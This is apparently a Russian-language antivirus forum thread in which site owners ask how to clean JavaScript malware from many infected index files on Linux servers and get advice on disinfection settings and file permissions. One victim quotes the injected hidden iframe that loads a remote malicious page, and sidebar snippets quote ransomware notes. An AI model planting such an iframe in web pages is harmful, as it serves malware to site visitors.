Перейти к содержанию

Не лечятся файлы с вирусом на Linux сервере


mixey

Рекомендуемые сообщения

Как можно вылечить зараженные файлы на сервере (не предлагать ручное удаление вируса)?

Вирус: DoS.JS.Dframe.a

Операционная система на сервере: Fedora Core

Антивирус касперского находит файлы, но лечить отказывается.

 

Заражены файлы index.php (htm, html и пр расширения).

Может существуют какие-либо утилиты для удаления вредоносного кода?

Ссылка на комментарий
Поделиться на другие сайты

Есть Антивирус Касперского для Linux File Server - http://www.kaspersky.ru/anti-virus_linux_file_server

Загрузить пробную версию можно отсюда - http://www.kaspersky.ru/anti-virus_fileservers_trial

 

Кстати, компания Untangle совсем недавно назвала Касперского лучшим Linux-антивирусом ;)

 

ЗЫ Внушительный список антивирусов для Линукса (как платных, так и бесплатных) Вы можете посмотреть здесь - http://www.nixp.ru/soft/security_antivir

Изменено пользователем radioelectron
Ссылка на комментарий
Поделиться на другие сайты

Linux File Server и установил. Вирус находит, но не лечит, только удаляет.

Хотя нужно чтобы удалил только JSвирусный код.

Вручную удалить вирусный код очень тяжело (index файлов около 1500)

Ссылка на комментарий
Поделиться на другие сайты

Проверьте настройки антивируса - должен быть включен режим лечения (секция [scanner.options], параметр Cure=yes).

 

Также можно управлять приложением с помощью Kaspersky Administration Kit:

 

post-70-1187007328_thumb.gif

 

Вкладка "Параметры", пункт "Лечить зараженные объекты".

Изменено пользователем radioelectron
Ссылка на комментарий
Поделиться на другие сайты

Значит, остается только два варианта.

 

Если у Вас лицензия - можете зайти на страницу регистрации для клиентов Лаборатории Касперского. И из персонального кабинета написать в техподдержку конкретно по Вашему продукту.

 

И второй способ - попробовать что-нибудь из этого списка

Изменено пользователем radioelectron
Ссылка на комментарий
Поделиться на другие сайты

  • 3 weeks later...

У меня тоже с этим большая проблема. Сервер Linux, сайт http://kommersant.org.ua

 

Началось всё месяца два назад, когда Google заблокировал мой сайт, ссылаясь на вредоносное ПО а при открытии сайта -

АВК дико пищал, что найден вирус - Trojan-Downloader.JS.Psyme.jm - и блокировал сам сайт.

 

Тогда пересмотрел код главной страницы и нашел там такую запись:

<iframe src='http://ltds.biz/go.php?id=3240&user_name=gh0st' width='1' height='1' style='visibility: hidden;'></iframe>"

 

Удалил. Через три дня код опять появился на сайте. Я удалил - через неделю то же самое.

 

И так до сих пор. Хорошо, что index страниц там всего три - можно и ручками удалить. Может что посоветуете?

 

 

 

P.S. В вирусах я мало что пониманию. А антивирусом ЛК пользуюсь уже лет пять наверное. Лицензия - персональная.

Изменено пользователем Современник
Ссылка на комментарий
Поделиться на другие сайты

Может что посоветуете?

Ни в коем случае нельзя ставить права доступа к файлам 777. У Вас наверняка стоит разрешение на запись, и любой прохожий кулхацкер может запросто перезаписать любой файл вредоносным.

 

Если Вы не понимаете, о чем я говорю - смотрите сюда - http://omsk777.ru/all.php?act=dostup

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • FredyFox
      От FredyFox
      Вирус не лечится. Все что пишется о нем - название и что сидит в System Memory. Все, что мог бы использовать для его удаления, закрывается моментально при попытке использовать. Могу пытаться что-то с этим сделать только в безопасном режиме
    • Jortin
      От Jortin
      Доброго дня! Неизвестно когда успел подцепить вирус HEUR:Trojan.Multi.GenBadur.genw. 
      По поведению вируса все то же самое что и написано в его описании, сначала появляется окно с предложением лечения вируса с перезагрузкой, но после нее, он появляется  вновь. Файл автологгера прикрепляю.
      CollectionLog-2024.11.07-09.15.zip
    • jserov96
      От jserov96
      Шифровальщик запустился скорее всего из планировщика заданий ровно в 21:00 16 ноября в субботу.  Время указано на основе найденных зашифрованных файлов. Шифровальщик нашел все скрытые диски, подключил все бекапы, зашифровал все содержимое .vhd бекапов, и сами бекапы тоже зашифровал. Сервер отключен, диск с бекапами снят, зашифрованные .vhd файлы перенесены на другой диск, чтобы попробовать вытащить файлы. Шифровальщик шифрует первый 20000h байт файла и дописывает 300h байт в огромные файлы, видимо сделано для ускорения шифрования всего диска. Особенность: выполняемые файлы не шифруются!
      vx2.rar
    • lex-xel
      От lex-xel
      Добрый день!
      Аналогичная ситуация  сервер подвергся взлому, база данных заархивирована с шифрованием.
      Антивирус снесли, хоть он был под паролем.
      Подскажите есть способ как то исправить ситуацию, расшифровать базу данных?
       
      Do you really want to restore your files?
      Write to email: a38261062@gmail.com
       
      Сообщение от модератора Mark D. Pearlstone перемещено из темы.
         
    • specxpilot
      От specxpilot
      Текст сообщения 
      !!!Your files have been encrypted!!!
      To recover them, please contact us via email:
      Write the ID in the email subject
      ID: E3EA701E87735CC1E8DD980E923F89D4
      Email 1: Datablack0068@gmail.com
      Email 2: Datablack0068@cyberfear.com
      Telegram: @Datablack0068

      To ensure decryption you can send 1-2 files (less than 1MB) we will decrypt it for free.
      IF 48 HOURS PASS WITHOUT YOUR ATTENTION, BRACE YOURSELF FOR A DOUBLED PRICE.
      WE DON'T PLAY AROUND HERE, TAKE THE HOURS SERIOUSLY.
×
×
  • Создать...